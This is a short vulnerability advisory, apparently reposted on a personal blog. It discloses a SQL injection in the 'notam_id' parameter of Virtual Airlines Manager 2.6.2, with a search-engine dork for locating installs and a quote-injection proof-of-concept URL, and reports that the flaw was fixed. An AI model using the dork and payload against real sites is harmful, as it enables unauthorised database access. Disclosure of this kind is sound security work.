Search
  • Pankaj

Virtual Airlines Manager 2.6.2 - 'notam' SQL Injection





# Exploit Title: Virtual Airlines Manager 2.6.2 - 'notam' SQL Injection # Date: 2020-06-07 # Exploit Author: Pankaj Kumar Thakur # Vendor Homepage: http://virtualairlinesmanager.net/ # Dork: inurl:notam_id= # Affected Version: 2.6.2 # Tested on: Ubuntu # CVE : N/A Vulnerable parameter ------------------- notam_id=%27%27 Id parameter's value is going into sql query directly! Proof of concept --------------- https://localhost:8080/vam/index.php?page=notam&notam_id=11%27%27 Submitted: Jun 1 2020 Fixed: Jun 5 2020 Acknowledgement : https://ibb.co/Y3WYdFN


235 views0 comments